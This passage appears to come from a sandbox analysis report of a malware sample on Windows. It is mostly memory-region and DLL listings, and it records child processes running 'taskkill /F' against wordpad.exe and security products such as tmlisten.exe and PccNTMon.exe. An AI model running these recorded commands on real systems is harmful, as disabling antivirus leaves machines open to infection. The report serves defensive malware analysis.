= 3495 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 3496 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 3497 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3498 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3499 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3500 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3501 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3502 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3503 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3504 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3505 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3506 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3507 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3508 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3509 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3510 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3511 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3512 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3513 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3514 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Thread: id = 274 os_tid = 0xd2c Thread: id = 327 os_tid = 0xe4c Thread: id = 334 os_tid = 0xe8c Thread: id = 339 os_tid = 0xea0 Thread: id = 340 os_tid = 0xea4 Process: id = "41" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x273bc000" os_pid = "0xd48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM wordpad.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3073 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3074 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3075 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3076 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 3077 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3078 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3079 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3080 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 3081 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3082 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3083 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 3084 start_va = 0x7fffffde000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 3085 start_va = 0x100000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 3086 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3087 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 277 os_tid = 0xd4c Thread: id = 331 os_tid = 0xe80 Thread: id = 335 os_tid = 0xe90 Thread: id = 343 os_tid = 0xeb0 Thread: id = 344 os_tid = 0xeb4 Process: id = "42" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x208db000" os_pid = "0xdb4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM xfssvccon.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3280 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3281 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3282 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3283 start_va = 0x110000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 3284 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3285 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3286 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3287 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 3288 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3289 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3290 start_va = 0x7fffffd6000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 3291 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 3292 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 3293 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3294 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 300 os_tid = 0xdb8 Thread: id = 332 os_tid = 0xe84 Thread: id = 337 os_tid = 0xe98 Thread: id = 348 os_tid = 0xed0 Thread: id = 349 os_tid = 0xed4 Process: id = "43" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x286fb000" os_pid = "0xde8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM tmlisten.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3295 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3296 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3297 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3298 start_va = 0x110000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 3299 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3300 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3301 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3302 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 3303 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3304 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3305 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 3306 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 3307 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 3308 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3309 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3545 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3546 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 3547 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3548 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 3549 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 3550 start_va = 0xe0000 end_va = 0xe3fff entry_point = 0xe0000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui") Region: id = 3551 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 3552 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 3553 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 3554 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3555 start_va = 0x1b0000 end_va = 0x1f4fff entry_point = 0x1b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3556 start_va = 0x200000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3557 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 3558 start_va = 0x460000 end_va = 0x5e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3559 start_va = 0x5f0000 end_va = 0x770fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 3560 start_va = 0x780000 end_va = 0x1b7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 3561 start_va = 0x1b80000 end_va = 0x1c3ffff entry_point = 0x1b80000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 3562 start_va = 0x1d70000 end_va = 0x1deffff entry_point = 0x0 region_type = private name = "private_0x0000000001d70000" filename = "" Region: id = 3563 start_va = 0x1ed0000 end_va = 0x1f4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 3564 start_va = 0x1f60000 end_va = 0x1fdffff entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 3565 start_va = 0x2120000 end_va = 0x219ffff entry_point = 0x0 region_type = private name = "private_0x0000000002120000" filename = "" Region: id = 3566 start_va = 0x21a0000 end_va = 0x246efff entry_point = 0x21a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3567 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3568 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3569 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3570 start_va = 0x7fef4590000 end_va = 0x7fef46b4fff entry_point = 0x7fef4590000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 3571 start_va = 0x7fef7320000 end_va = 0x7fef732efff entry_point = 0x7fef7320000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 3572 start_va = 0x7fef7490000 end_va = 0x7fef7515fff entry_point = 0x7fef7490000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 3573 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 3574 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 3575 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 3576 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 3577 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 3578 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 3579 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 3580 start_va = 0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3581 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 3582 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 3583 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3584 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3585 start_va = 0x7fefd560000 end_va = 0x7fefd59cfff entry_point = 0x7fefd560000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 3586 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3587 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3588 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3589 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3590 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3591 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3592 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3593 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3594 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3595 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3596 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3597 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3598 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3599 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3600 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3601 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 3602 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Thread: id = 308 os_tid = 0xdec Thread: id = 341 os_tid = 0xea8 Thread: id = 355 os_tid = 0xf08 Thread: id = 360 os_tid = 0xf28 Thread: id = 361 os_tid = 0xf2c Process: id = "44" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x6fe1a000" os_pid = "0xe3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM PccNTMon.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3436 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3437 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3438 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3439 start_va = 0x170000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3440 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = 